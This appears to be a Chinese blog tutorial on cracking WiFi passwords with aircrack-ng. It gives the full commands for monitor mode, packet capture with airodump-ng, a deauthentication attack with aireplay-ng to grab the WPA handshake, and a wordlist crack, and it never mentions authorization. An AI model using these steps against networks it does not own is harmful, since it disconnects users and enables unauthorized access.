近源渗透之无线网络 - WiFi边界突破

WiFi破解基础教程,本文主要介绍aircreak-ng工具的使用,以及相关参数解释。

准备工作

一个装有Kali的虚拟机,一个支持破解的无线网卡(这里我用的是RT5370),以及本教程


开始破解

首先用airmon-ng检查网卡是否安装成功

1586697275479


接着用airmon-ng check kill检查是否有与aircreak冲突的进程然后杀掉

1586697577030


airmon-ng start wlan0 启动网卡侦听 把网卡置换成monitor模式

1586700814566

可以看到网卡已经变成了minitor模式


然后就可以开始抓包了

airodump-ng wlan0mon

1586699454560

airodump-ng的参数

airodump-ng wlan0mon -c xxx 指定信道

airodump-ng wlan0mon -c xxx --bssid xxx 指定AP

airodump-ng wlan0mon -c xxx --bssid xxx -w test1 保存在文件

相关名词解释

RXQ:最近10秒成功接收的数据帧的百分比(固定信道才有)

PWR:信号强度

beacons:接收到此AP发送的beacon帧数量

#data:抓到的数据帧数量(wep表示iv数量)

#/s:最近10秒每秒平均抓到的帧数量

MB:AP支持的最大速率

ENC:采用的无线安全技术WEP/WPA/WPA2/OPEN

CIPHER:加密套件

AUTH:身份认证

ESSID:无线名称     无表示为<length:0>

(not ass):没有连上AP的设备

LOST:sta发送的丢包数量

Frames:STA发包数量

Probe:STA探测到的AP名称

接着就可以开始攻击了

先把想要破解的wifi MAC和连接上它的设备MAC记录下来

aireplay-ng -0 10 -a APmac -c STAmac wlan0mon

攻击使其掉线重连,从而抓到握手包

1586702751880

抓到握手包后右上角会提示

1586703911857

有了握手包后我们就可以开始破解密码工作了

aircrack-ng -w 密码字典.txt test1-01.cap

1586704743902


教程至此结束,如有疑问欢迎留言,鼓励手打不要复制粘贴以及善用搜索引擎。
posted @ 2020-04-26 11:01  SinkingStar  阅读(746)  评论(0)    收藏  举报